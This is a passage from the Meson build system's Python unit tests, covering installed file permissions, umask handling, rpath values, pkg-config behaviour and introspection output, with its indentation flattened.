Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '59 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '190 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skipIfNoPkgconfig
def test_build_rpath_pkgconfig(self):
'''
Test that current build artefacts (libs) are found first on the rpath,
manually specified rpath comes second and additional rpath elements (from
pkg-config files) come last
'''
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '90 pkgconfig build rpath order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar:/foo/dummy')
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar:/foo/dummy')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz:/foo/dummy')
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz:/foo/dummy')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '80 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
continue
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
tool_path = os.path.join(testdir, 'some_cross_tool.py')
crossfile.write(textwrap.dedent(f'''\
[binaries]
c = '{shutil.which('gcc' if is_sunos() else 'cc')}'
ar = '{shutil.which('ar')}'
strip = '{shutil.which('strip')}'
sometool.py = ['{tool_path}']
someothertool.py = '{tool_path}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
'''))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({OptionKey('pkg_config_path'): pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_duplicate_path_entries(self):
testdir = os.path.join(self.unit_test_dir, '111 pkgconfig duplicate path entries')
pkg_dir = os.path.join(testdir, 'pkgconfig')
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({OptionKey('pkg_config_path'): pkg_dir}, subproject='')
PkgConfigDependency.setup_env({}, env, MachineChoice.HOST, pkg_dir)
pkg_config_path = env.coredata.options[OptionKey('pkg_config_path')].value
self.assertTrue(len(pkg_config_path) == 1)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '66 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.src_root, 'test cases', 'native', '9 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '75 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '75 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '75 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('59 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('190 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('190 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write(textwrap.dedent('''\
[binaries]
c = ['{}']
'''.format(os.path.join(testdir, 'build_wrapper.py'))))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write(textwrap.dedent('''\
[binaries]
c = ['{}']
'''.format(os.path.join(testdir, 'host_wrapper.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
